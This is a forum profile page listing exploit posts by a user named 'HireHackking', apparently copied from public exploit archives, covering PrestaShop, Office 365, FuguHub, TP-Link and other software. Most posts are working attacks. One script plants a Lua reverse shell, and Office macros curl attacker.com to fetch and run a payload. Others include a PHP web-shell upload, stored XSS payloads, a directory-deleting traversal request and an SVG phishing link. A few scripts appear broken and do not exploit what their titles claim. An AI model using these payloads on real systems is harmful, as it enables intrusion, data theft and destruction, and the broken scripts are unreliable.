Jump to content

HireHackking

Members

  • Joined

  • Last visited

View Profile Find content

Everything posted by HireHackking

  1. HireHackking

    PrestaShop Winbiz Payment module - Improper Limitation of a Pathname to a Restricted Directory

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: PrestaShop Winbiz Payment module - Improper Limitation of a Pathname to a Restricted Directory # Date: 2023-06-20 # Dork: /modules/winbizpayment/downloads/download.php # country: Iran # Exploit Author: Amirhossein Bahramizadeh # Category : webapps # Vendor Homepage: https://shop.webbax.ch/modules-pour-winbiz/153-module-prestashop-winbiz-payment-reverse.html # Version: 17.1.3 (REQUIRED) # Tested on: Windows/Linux # CVE : CVE-2023-30198 import requests import string import random # The base URL of the vulnerable site base_url = "http://example.com" # The URL of the login page login_url = base_url + "/authentication.php" # The username and password for the admin account username = "admin" password = "password123" # The URL of the vulnerable download.php file download_url = base_url + "/modules/winbizpayment/downloads/download.php" # The ID of the order to download order_id = 1234 # The path to save the downloaded file file_path = "/tmp/order_%d.pdf" % order_id # The session cookies to use for the requests session_cookies = None # Generate a random string for the CSRF token csrf_token = ''.join(random.choices(string.ascii_uppercase + string.digits, k=32)) # Send a POST request to the login page to authenticate as the admin user login_data = {"email": username, "passwd": password, "csrf_token": csrf_token} session = requests.Session() response = session.post(login_url, data=login_data) # Save the session cookies for future requests session_cookies = session.cookies.get_dict() # Generate a random string for the CSRF token csrf_token = ''.join(random.choices(string.ascii_uppercase + string.digits, k=32)) # Send a POST request to the download.php file to download the order PDF download_data = {"id_order": order_id, "csrf_token": csrf_token} response = session.post(download_url, cookies=session_cookies, data=download_data) # Save the downloaded file to disk with open(file_path, "wb") as f: f.write(response.content) # Print a message indicating that the file has been downloaded print("File downloaded to %s" % file_path)
  2. HireHackking

    Azure Apache Ambari 2302250400 - Spoofing

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Azure Apache Ambari 2302250400 - Spoofing # Date: 2023-06-23 # country: Iran # Exploit Author: Amirhossein Bahramizadeh # Category : Remote # Vendor Homepage: Microsoft Apache Ambari Microsoft azure Hdinsights # Tested on: Windows/Linux # CVE : CVE-2023-23408 import requests # Set the URL and headers for the Ambari web interface url = "https://ambari.example.com/api/v1/clusters/cluster_name/services" headers = {"X-Requested-By": "ambari", "Authorization": "Basic abcdefghijklmnop"} # Define a function to validate the headers def validate_headers(headers): if "X-Requested-By" not in headers or headers["X-Requested-By"] != "ambari": return False if "Authorization" not in headers or headers["Authorization"] != "Basic abcdefghijklmnop": return False return True # Define a function to send a request to the Ambari web interface def send_request(url, headers): if not validate_headers(headers): print("Invalid headers") return response = requests.get(url, headers=headers) if response.status_code == 200: print("Request successful") else: print("Request failed") # Call the send_request function with the URL and headers send_request(url, headers)
  3. HireHackking

    Rukovoditel 3.4.1 - Multiple Stored XSS

    HireHackking posted a blog entry in Hacker Technology
    Exploit Title: Rukovoditel 3.4.1 - Multiple Stored XSS Version: 3.4.1 Bugs: Multiple Stored XSS Technology: PHP Vendor URL: https://www.rukovoditel.net/ Software Link: https://www.rukovoditel.net/download.php Date of found: 24-06-2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================== ###XSS-1### ======================================== steps: 1. login to account 2. create project (http://localhost/index.php?module=items/items&path=21) 3. add task 4. open task 5. add comment as "<iframe src="https://14.rs"></iframe> " POST /index.php?module=items/comments&action=save&token=FEOZ9jeKuA HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 241 Origin: http://localhost Connection: close Referer: http://localhost/index.php?module=items/info&path=21-2/22-1&redirect_to=subentity&gotopage[74]=1 Cookie: cookie_test=please_accept_for_session; sid=vftrl4mhmbvdbrvfmb0rb54vo5 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 form_session_token=FEOZ9jeKuA&path=21-2%2F22-1&fields%5B169%5D=47&fields%5B170%5D=53&fields%5B174%5D=3&description=%3Ciframe+src%3D%22https%3A%2F%2F14.rs%22%3E%3C%2Fiframe%3E+&uploadifive_attachments_upload_attachments=&comments_attachments= =========================== ###XSS-2### =========================== 1.go to admin account 2.go to configration => applicaton 3.Copyright Text set as "<img src=x onerror=alert(1)>" POST /index.php?module=configuration/save&redirect_to=configuration/application HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------12298384558648010343132232769 Content-Length: 2766 Origin: http://localhost Connection: close Referer: http://localhost/index.php?module=configuration/application Cookie: cookie_test=please_accept_for_session; sid=vftrl4mhmbvdbrvfmb0rb54vo5 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 -----------------------------12298384558648010343132232769 Content-Disposition: form-data; name="form_session_token" ju271AAoy1 -----------------------------12298384558648010343132232769 Content-Disposition: form-data; name="CFG[APP_NAME]" Rukovoditel -----------------------------12298384558648010343132232769 Content-Disposition: form-data; name="CFG[APP_SHORT_NAME_MOBILE]" ffgsdfgsdfg -----------------------------12298384558648010343132232769 Content-Disposition: form-data; name="CFG[APP_SHORT_NAME]" ruko -----------------------------12298384558648010343132232769 Content-Disposition: form-data; name="APP_LOGO"; filename="" Content-Type: application/octet-stream -----------------------------12298384558648010343132232769 Content-Disposition: form-data; name="CFG[APP_LOGO]" -----------------------------12298384558648010343132232769 Content-Disposition: form-data; name="CFG[APP_LOGO_URL]" -----------------------------12298384558648010343132232769 Content-Disposition: form-data; name="APP_FAVICON"; filename="" Content-Type: application/octet-stream -----------------------------12298384558648010343132232769 Content-Disposition: form-data; name="CFG[APP_FAVICON]" -----------------------------12298384558648010343132232769 Content-Disposition: form-data; name="CFG[APP_COPYRIGHT_NAME]" <img src=x onerror=alert(1)> -----------------------------12298384558648010343132232769 Content-Disposition: form-data; name="CFG[APP_LANGUAGE]" english.php -----------------------------12298384558648010343132232769 Content-Disposition: form-data; name="CFG[APP_SKIN]" -----------------------------12298384558648010343132232769 Content-Disposition: form-data; name="CFG[APP_TIMEZONE]" America/New_York -----------------------------12298384558648010343132232769 Content-Disposition: form-data; name="CFG[APP_ROWS_PER_PAGE]" 10 -----------------------------12298384558648010343132232769 Content-Disposition: form-data; name="CFG[APP_DATE_FORMAT]" m/d/Y -----------------------------12298384558648010343132232769 Content-Disposition: form-data; name="CFG[APP_DATETIME_FORMAT]" m/d/Y H:i -----------------------------12298384558648010343132232769 Content-Disposition: form-data; name="CFG[APP_NUMBER_FORMAT]" 2/./* -----------------------------12298384558648010343132232769 Content-Disposition: form-data; name="CFG[APP_FIRST_DAY_OF_WEEK]" 0 -----------------------------12298384558648010343132232769 Content-Disposition: form-data; name="CFG[DROP_DOWN_MENU_ON_HOVER]" 0 -----------------------------12298384558648010343132232769 Content-Disposition: form-data; name="CFG[DISABLE_CHECK_FOR_UPDATES]" 0 -----------------------------12298384558648010343132232769--
  4. HireHackking

    Xenforo Version 2.2.13 - Authenticated Stored XSS

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Xenforo Version 2.2.13 - Authenticated Stored XSS # Date: 2023-06-24 # Exploit Author: Furkan Karaarslan # Category : Webapps # Vendor Homepage: https://x.com/admin.php?smilies # Version: 2.2.12 (REQUIRED) # Tested on: Windows/Linux # CVE : ----------------------------------------------------------------------------- Requests POST /admin.php?smilie-categories/0/save HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1/admin.php?smilies/ X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------333176689514537912041638543422 Content-Length: 1038 Origin: http://127.0.0.1 Connection: close Cookie: xf_csrf=aEWkQ90jbPs2RECi; xf_session=yCLGXIhbOq9bSNKAsymJPWYVvTotiofa; xf_session_admin=wlr6UqjWxCkpfjKlngAvH5t-4yGiK5mQ Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------333176689514537912041638543422 Content-Disposition: form-data; name="_xfToken" 1687616851,83fd2350307156281e51b17e20fe575b -----------------------------333176689514537912041638543422 Content-Disposition: form-data; name="title" <img src=x onerror=alert(document.domain)> -----------------------------333176689514537912041638543422 Content-Disposition: form-data; name="display_order" 1 -----------------------------333176689514537912041638543422 Content-Disposition: form-data; name="_xfRequestUri" /admin.php?smilies/ -----------------------------333176689514537912041638543422 Content-Disposition: form-data; name="_xfWithData" 1 -----------------------------333176689514537912041638543422 Content-Disposition: form-data; name="_xfToken" 1687616849,b74724a115448b864ba2db8f89f415f5 -----------------------------333176689514537912041638543422 Content-Disposition: form-data; name="_xfResponseType" json -----------------------------333176689514537912041638543422-- Response: After it is created, an alert comes immediately.
  5. HireHackking

    Sales of Cashier Goods v1.0 - Cross Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Sales of Cashier Goods v1.0 - Cross Site Scripting (XSS) # Date: 2023-06-23 # country: Iran # Exploit Author: Amirhossein Bahramizadeh # Category : webapps # Dork : /print.php?nm_member= # Vendor Homepage: https://www.codekop.com/products/source-code-aplikasi-pos-penjualan-barang-kasir-dengan-php-mysql-3.html # Tested on: Windows/Linux # CVE : CVE-2023-36346 import requests import urllib.parse # Set the target URL and payload url = "http://example.com/print.php" payload = "<script>alert('XSS')</script>" # Encode the payload for URL inclusion payload = urllib.parse.quote(payload) # Build the request parameters params = { "nm_member": payload } # Send the request and print the response response = requests.get(url, params=params) print(response.text)
  6. HireHackking

    POS Codekop v2.0 - Authenticated Remote Code Execution (RCE)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: POS Codekop v2.0 - Authenticated Remote Code Execution (RCE) # Date: 25-05-2023 # Exploit Author: yuyudhn # Vendor Homepage: https://www.codekop.com/ # Software Link: https://github.com/fauzan1892/pos-kasir-php # Version: 2.0 # Tested on: Linux # CVE: CVE-2023-36348 # Vulnerability description: The application does not sanitize the filename parameter when sending data to /fungsi/edit/edit.php?gambar=user. An attacker can exploit this issue by uploading a PHP file and accessing it, leading to Remote Code Execution. # Reference: https://yuyudhn.github.io/pos-codekop-vulnerability/ # Proof of Concept: 1. Login to POS Codekop dashboard. 2. Go to profile settings. 3. Upload PHP script through Upload Profile Photo. Burp Log Example: ``` POST /research/pos-kasir-php/fungsi/edit/edit.php?gambar=user HTTP/1.1 Host: localhost Content-Length: 8934 Cache-Control: max-age=0 sec-ch-ua: sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "" **Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: multipart/form-data; boundary=----WebKitFormBoundarymVBHqH4m6KgKBnpa User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-User: ?1** Sec-Fetch-Dest: document Referer: http://localhost/research/pos-kasir-php/index.php?page=user Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=vqlfiarme77n1r4o8eh2kglfhv Connection: close ------WebKitFormBoundarymVBHqH4m6KgKBnpa Content-Disposition: form-data; name="foto"; filename="asuka-rce.php" Content-Type: image/jpeg ÿØÿà JFIF HHÿþ6<?php passthru($_GET['cmd']); __halt_compiler(); ?> ÿÛC ----------------------------- ``` PHP Web Shell location: http://localhost/research/pos-kasir-php/assets/img/user/[random_number]asuka-rce.php
  7. HireHackking

    FuguHub 8.1 - Remote Code Execution

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: FuguHub 8.1 - Remote Code Execution # Date: 6/24/2023 # Exploit Author: redfire359 # Vendor Homepage: https://fuguhub.com/ # Software Link: https://fuguhub.com/download.lsp # Version: 8.1 # Tested on: Ubuntu 22.04.1 # CVE : CVE-2023-24078 import requests from bs4 import BeautifulSoup import hashlib from random import randint from urllib3 import encode_multipart_formdata from urllib3.exceptions import InsecureRequestWarning import argparse from colorama import Fore requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) #Options for user registration, if no user has been created yet username = 'admin' password = 'password' email = 'admin@admin.com' parser = argparse.ArgumentParser() parser.add_argument("-r","--rhost", help = "Victims ip/url (omit the http://)", required = True) parser.add_argument("-rp","--rport", help = "http port [Default 80]") parser.add_argument("-l","--lhost", help = "Your IP", required = True) parser.add_argument("-p","--lport", help = "Port you have your listener on", required = True) args = parser.parse_args() LHOST = args.lhost LPORT = args.lport url = args.rhost if args.rport != None: port = args.rport else: port = 80 def main(): checkAccount() def checkAccount(): print(f"{Fore.YELLOW}[*]{Fore.WHITE} Checking for admin user...") s = requests.Session() # Go to the set admin page... if page contains "User database already saved" then there are already admin creds and we will try to login with the creds, otherwise we will manually create an account r = s.get(f"http://{url}:{port}/Config-Wizard/wizard/SetAdmin.lsp") soup = BeautifulSoup(r.content, 'html.parser') search = soup.find('h1') if r.status_code == 404: print(Fore.RED + "[!]" + Fore.WHITE +" Page not found! Check the following: \n\tTaget IP\n\tTarget Port") exit(0) userExists = False userText = 'User database already saved' for i in search: if i.string == userText: userExists = True if userExists: print(f"{Fore.GREEN}[+]{Fore.WHITE} An admin user does exist..") login(r,s) else: print("{Fore.GREEN}[+]{Fore.WHITE} No admin user exists yet, creating account with {username}:{password}") createUser(r,s) login(r,s) def createUser(r,s): data = { email : email , 'user' : username , 'password' : password , 'recoverpassword' : 'on' } r = s.post(f"http://{url}:{port}/Config-Wizard/wizard/SetAdmin.lsp", data = data) print(f"{Fore.GREEN}[+]{Fore.WHITE} User Created!") def login(r,s): print(f"{Fore.GREEN}[+]{Fore.WHITE} Logging in...") data = {'ba_username' : username , 'ba_password' : password} r = s.post(f"https://{url}:443/rtl/protected/wfslinks.lsp", data = data, verify = False ) # switching to https cause its easier to script lolz #Veryify login login_Success_Title = 'Web-File-Server' soup = BeautifulSoup(r.content, 'html.parser') search = soup.find('title') for i in search: if i != login_Success_Title: print(f"{Fore.RED}[!]{Fore.WHITE} Error! We got sent back to the login page...") exit(0) print(f"{Fore.GREEN}[+]{Fore.WHITE} Success! Finding a valid file server link...") exploit(r,s) def exploit(r,s): #Find the file server, default is fs r = s.get(f"https://{url}:443/fs/cmsdocs/") code = r.status_code if code == 404: print(f"{Fore.RED}[!]{Fore.WHITE} File server not found. ") exit(0) print(f"{Fore.GREEN}[+]{Fore.WHITE} Code: {code}, found valid file server, uploading rev shell") #Change the shell if you want to, when tested I've had the best luck with lua rev shell code so thats what I put as default shell = f'local host, port = "{LHOST}", {LPORT} \nlocal socket = require("socket")\nlocal tcp = socket.tcp() \nlocal io = require("io") tcp:connect(host, port); \n while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, "r") local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()' file_content = f''' <h2> Check ur nc listener on the port you put in <h2> <?lsp if request:method() == "GET" then ?> <?lsp {shell} ?> <?lsp else ?> Wrong request method, goodBye! <?lsp end ?> ''' files = {'file': ('rev.lsp', file_content, 'application/octet-stream')} r = s.post(f"https://{url}:443/fs/cmsdocs/", files=files) if r.text == 'ok' : print(f"{Fore.GREEN}[+]{Fore.WHITE} Successfully uploaded, calling shell ") r = s.get(f"https://{url}:443/rev.lsp") if __name__=='__main__': try: main() except: print(f"\n{Fore.YELLOW}[*]{Fore.WHITE} Good bye!\n\n**All Hail w4rf4ther!")
  8. HireHackking

    WebsiteBaker v2.13.3 - Stored XSS

    HireHackking posted a blog entry in Hacker Technology
    Exploit Title: WebsiteBaker v2.13.3 - Stored XSS Application: WebsiteBaker Version: 2.13.3 Bugs: Stored XSS Technology: PHP Vendor URL: https://websitebaker.org/pages/en/home.php Software Link: https://wiki.websitebaker.org/doku.php/en/downloads Date of found: 26.06.2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================== steps: 1. login to account 2. go to media 3. upload svg file """ <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(document.location); </script> </svg> """ 4. go to svg file (http://localhost/media/malas.svg)
  9. HireHackking

    Microsoft 365 MSO (Version 2305 Build 16.0.16501.20074) 64-bit - Remote Code Execution (RCE)

    HireHackking posted a blog entry in Hacker Technology
    ## Title: Microsoft 365 MSO (Version 2305 Build 16.0.16501.20074) 64-bit - Remote Code Execution (RCE) ## Author: nu11secur1ty ## Date: 04.17.2023 ## Vendor: https://www.microsoft.com/ ## Software: https://www.microsoft.com/en-us/microsoft-365/ ## Reference: https://www.crowdstrike.com/cybersecurity-101/remote-code-execution-rce/ ## CVE-2023-28285 ## Description: The attack itself is carried out locally by a user with authentication to the targeted system. An attacker could exploit the vulnerability by convincing a victim, through social engineering, to download and open a specially crafted file from a website which could lead to a local attack on the victim's computer. The attacker can trick the victim to open a malicious web page by using a malicious `Word` file for `Office-365 API`. After the user will open the file to read it, from the API of Office-365, without being asked what it wants to activate, etc, he will activate the code of the malicious server, which he will inject himself, from this malicious server. Emedietly after this click, the attacker can receive very sensitive information! For bank accounts, logs from some sniff attacks, tracking of all the traffic of the victim without stopping, and more malicious stuff, it depends on the scenario and etc. STATUS: HIGH Vulnerability [+]Exploit: The exploit server must be BROADCASTING at the moment when the victim hit the button of the exploit! [+]PoC: ```cmd Sub AutoOpen() Call Shell("cmd.exe /S /c" & "curl -s http://attacker.com/CVE-2023-28285/PoC.debelui | debelui", vbNormalFocus) End Sub ``` ## FYI: The PoC has a price and this report will be uploaded with a description and video of how you can reproduce it only. ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-28285) ## Proof and Exploit [href](https://www.nu11secur1ty.com/2023/04/cve-2023-28285-microsoft-office-remote.html) ## Time spend: 01:30:00
  10. HireHackking

    Microsoft 365 MSO (Version 2305 Build 16.0.16501.20074) 32-bit - Remote Code Execution (RCE)

    HireHackking posted a blog entry in Hacker Technology
    ## Title:Microsoft 365 MSO (Version 2305 Build 16.0.16501.20074) 32-bit - Remote Code Execution (RCE) ## Author: nu11secur1ty ## Date: 06.27.2023 ## Vendor: https://www.microsoft.com/ ## Software: https://www.microsoft.com/en-us/microsoft-365/excel ## Reference: https://portswigger.net/daily-swig/rce ## CVE-2023-33137 ## Description: This exploit is connected with third part exploit server, which waits for the victim to call him and execute the content from him using the pipe posting method! This is absolutely a 0-day exploit! This is absolutely dangerous for the victims, who are infected by him! When the victim hit the button in the Excel file, it makes a POST request to the exploit server, and the server is responding back that way: He creates another hidden malicious file and executed it directly on the machine of the victim, then everything is disappeared, so nasty. STATUS: HIGH Vulnerability WARNING: THIS IS VERY DANGER for the usual users! [+]Exploit: ```vbs Sub AutoOpen() Call Shell("cmd.exe /S /c" & "curl -s https://attacker.com/nu11secur1ty/somwhere/ontheinternet/maloumnici.bat > maloumnici.bat && .\maloumnici.bat", vbNormalFocus) End Sub ``` ## Reproduce: [href](https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2023/CVE-2023-33137) ## Proof and Exploit: [href](https://www.nu11secur1ty.com/2023/06/microsoft-excel-microsoft-365-mso.html) ## Time spend: 01:27:00
  11. HireHackking

    D-Link DAP-1325 - Broken Access Control

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: D-Link DAP-1325 - Broken Access Control # Date: 27-06-2023 # Exploit Author: ieduardogoncalves # Contact : twitter.com/0x00dia # Vendor : www.dlink.com # Version: Hardware version: A1 # Firmware version: 1.01 # Tested on:All Platforms 1) Description Security vulnerability known as "Unauthenticated access to settings" or "Unauthenticated configuration download". This vulnerability occurs when a device, such as a repeater, allows the download of user settings without requiring proper authentication. IN MY CASE, Tested repeater IP: http://192.168.0.21/ Video POC : https://www.dropbox.com/s/eqz0ntlzqp5472l/DAP-1325.mp4?dl=0 2) Proof of Concept Step 1: Go to Repeater Login Page : http://192.168.0.21/ Step 2: Add the payload to URL. Payload: http://{ip}/cgi-bin/ExportSettings.sh Payload: https://github.com/eeduardogoncalves/exploit
  12. HireHackking

    WebsiteBaker v2.13.3 - Directory Traversal

    HireHackking posted a blog entry in Hacker Technology
    Exploit Title: WebsiteBaker v2.13.3 - Directory Traversal Application: WebsiteBaker Version: 2.13.3 Bugs: Directory Traversal Technology: PHP Vendor URL: https://websitebaker.org/pages/en/home.php Software Link: https://wiki.websitebaker.org/doku.php/en/downloads Date of found: 26.06.2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================= arbitary directory deleting GET /admin/media/delete.php?dir=/../../../../../..//var/www&id=a838b6ebe8ba43a0 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Referer: http://localhost/admin/media/browse.php?dir=/../../../../../..//var/www Cookie: PHPSESSID-WB-6e6c39=bvnampsc5ji2drm439ph49143c; klaro=%7B%22klaro%22%3Atrue%2C%22mathCaptcha%22%3Atrue%7D Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin
  13. HireHackking

    Time Slot Booking Calendar 1.8 - Stored Cross-Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Time Slot Booking Calendar 1.8 - Stored XSS # Date: 29/06/2023 # Exploit Author: CraCkEr # Vendor: GZ Scripts # Vendor Homepage: https://gzscripts.com/ # Software Link: https://gzscripts.com/time-slot-booking-calendar-php.html # Version: 1.8 # Tested on: Windows 10 Pro # Impact: Manipulate the content of the site ## Release Notes: Allow Attacker to inject malicious code into website, give ability to steal sensitive information, manipulate data, and launch additional attacks. ## Stored XSS ----------------------------------------------- POST /TimeSlotBookingCalendarPHP/load.php?controller=GzFront&action=booking_details&cid=1 HTTP/1.1 promo_code=&title=prof&male=female&first_name=[XSS Payload]&second_name=[XSS Payload]&phone=[XSS Payload]&email=cracker%40infosec.com&company=&address_1=[XSS Payload]&address_2=xxx&city=xxx&state=xxx&zip=xxx&country=[XSS Payload]&additional=xxx&captcha=rtznqs&terms=1&cal_id=1&calendar_id=1 ----------------------------------------------- POST parameter 'first_name' is vulnerable to XSS POST parameter 'second_name' is vulnerable to XSS POST parameter 'phone' is vulnerable to XSS POST parameter 'address_1' is vulnerable to XSS POST parameter 'country' is vulnerable to XSS ## Steps to Reproduce: 1. As a [Guest User] Choose any Day Colored by Green on the Calendar - Click on [+] near Start/End Time - Press [Booking] 2. Inject your [XSS Payload] in "First Name" 3. Inject your [XSS Payload] in "Last Name" 4. Inject your [XSS Payload] in "Phone" 5. Inject your [XSS Payload] in "Address Line 1" 6. Inject your [XSS Payload] in "Country" 7. Accept with terms & Press [Booking] XSS Fired on Local User Browser 8. When ADMIN visit [Dashboard] in Administration Panel on this Path (https://website/index.php?controller=GzAdmin&action=dashboard) XSS Will Fire and Executed on his Browser 9. When ADMIN visit [Bookings] - [All Booking] to check [Pending Booking] on this Path (https://website/index.php?controller=GzBooking&action=index) XSS Will Fire and Executed on his Browser 10. When ADMIN visit [Invoices ] - [All Invoices] to check [Pending Invoices] on this Path (https://website/index.php?controller=GzInvoice&action=index) XSS Will Fire and Executed on his Browser [-] Done
  14. HireHackking

    spip v4.1.10 - Spoofing Admin account

    HireHackking posted a blog entry in Hacker Technology
    ## Exploit Title: spip v4.1.10 - Spoofing Admin account ## Author: nu11secur1ty ## Date: 06.29.2023 ## Vendor: https://www.spip.net/en_rubrique25.html ## Software: https://files.spip.net/spip/archives/spip-v4.1.10.zip ## Reference: https://www.crowdstrike.com/cybersecurity-101/spoofing-attacks/ ## Description: The malicious user can upload a malicious SVG file which file is not filtered by a security function, and he can trick the administrator of this system to check his logo by clicking on him and visiting, maybe a very dangerous URL. Wrong web app website logic, and not well sanitizing upload function. STATUS: HIGH- Vulnerability [+]Exploit: ```SVG <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"> <defs> <linearGradient id="badgeGradient"> <stop offset="0"/> <stop offset="1"/> </linearGradient> </defs> <g id="heading"> <a xlink:href= "https://rb.gy/74f0y"> <path id="badge" d="M 29.6,22.8 C 29.2,23.4 24.3,22.4 23.8,22.9 C 23.4,23.3 24.3,28.3 23.8,28.6 C 23.2,28.9 19.4,25.6 18.8,25.8 C 18.2,26.0 16.5,30.7 15.8,30.7 C 15.2,30.7 13.5,26.0 12.9,25.8 C 12.3,25.6 8.5,28.9 7.9,28.6 C 7.4,28.3 8.3,23.3 7.9,22.9 C 7.4,22.4 2.4,23.4 2.1,22.8 C 1.8,22.3 5.1,18.4 4.9,17.8 C 4.8,17.2 0.0,15.5 0.0,14.9 C 0.0,14.3 4.8,12.6 4.9,12.0 C 5.1,11.4 1.8,7.5 2.1,7.0 C 2.4,6.4 7.4,7.3 7.9,6.9 C 8.3,6.5 7.4,1.5 7.9,1.2 C 8.5,0.9 12.3,4.1 12.9,4.0 C 13.5,3.8 15.2,-0.8 15.8,-0.8 C 16.5,-0.8 18.2,3.8 18.8,4.0 C 19.4,4.1 23.2,0.9 23.8,1.2 C 24.3,1.5 23.4,6.5 23.8,6.9 C 24.3,7.3 29.2,6.4 29.6,7.0 C 29.9,7.5 26.6,11.4 26.8,12.0 C 26.9,12.6 31.7,14.3 31.7,14.9 C 31.7,15.5 26.9,17.2 26.8,17.8 C 26.6,18.4 29.9,22.3 29.6,22.8 z"/> <!--<text id="label" x="5" y="20" transform = "rotate(-15 10 10)">New</text>--> <text id="title" x="40" y="20">Please click on the logo, to see our design services, on our website, thank you!</text> </a> </g> </svg> ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/SPIP/SPIP-4.1.10) ## Proof and Exploit: [href](https://www.nu11secur1ty.com/2023/06/spip-v4110-spoofing-admin-account.html) ## Time spend: 00:37:00
  15. HireHackking

    Vacation Rental 1.8 - Stored Cross-Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Vacation Rental 1.8 - Stored Cross-Site Scripting (XSS) # Date: 30/06/2023 # Exploit Author: CraCkEr # Vendor: GZ Scripts # Vendor Homepage: https://gzscripts.com/ # Software Link: https://gzscripts.com/vacation-rental-website.html # Version: 1.8 # Tested on: Windows 10 Pro # Impact: Manipulate the content of the site ## Stored XSS ------------------------------------------------------------ POST /VacationRentalWebsite/property/8/ad-has-principes/ HTTP/1.1 property_id=8&action=detail&send_review=1&cleanliness=0%3B4.2&comfort=0%3B4.2&location=0%3B4.2&service=0%3B4.2&sleep=0%3B4.2&price=0%3B4.2&username=[XSS Payload]&evaluation=3&title=[XSS Payload]&comment=[XSS Payload]&captcha=lbhkyj ------------------------------------------------------------ POST parameter 'username' is vulnerable to XSS POST parameter 'title' is vulnerable to XSS POST parameter 'comment' is vulnerable to XSS ## Steps to Reproduce: 1. Surf (as Guest) - Go to any Listed Property 2. Go to [Customer Reviews] on this Path (http://website/property/[Number1-9]/[name-of-Property]/#customerReviews) 3. Inject your [XSS Payload] in "Username" 4. Inject your [XSS Payload] in "Title" 5. Inject your [XSS Payload] in "Comment" 6. Submit 7. XSS Fired on Local Browser 8. XSS will Fire & Execute on Visitor's Browser when they visit the page of Property you [Inject] the XSS Payloads in & XSS will Fire also on the [Reviews Page] Note: I think Administration Panel missing a section to Manage [Reviews] on the website this feature must be added in next Updates [View/Edit/Delete]
  16. HireHackking

    TP-Link TL-WR940N V4 - Buffer OverFlow

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: TP-Link TL-WR940N V4 - Buffer OverFlow # Date: 2023-06-30 # country: Iran # Exploit Author: Amirhossein Bahramizadeh # Category : hardware # Dork : /userRpm/WanDynamicIpV6CfgRpm # Tested on: Windows/Linux # CVE : CVE-2023-36355 import requests # Replace the IP address with the router's IP router_ip = '192.168.0.1' # Construct the URL with the vulnerable endpoint and parameter url = f'http://{router_ip}/userRpm/WanDynamicIpV6CfgRpm?ipStart=' # Replace the payload with a crafted payload that triggers the buffer overflow payload = 'A' * 5000 # Example payload, adjust the length as needed # Send the GET request with the crafted payload response = requests.get(url + payload) # Check the response status code if response.status_code == 200: print('Buffer overflow triggered successfully') else: print('Buffer overflow not triggered')
  17. HireHackking

    WP AutoComplete 1.0.4 - Unauthenticated SQLi

    HireHackking posted a blog entry in Hacker Technology
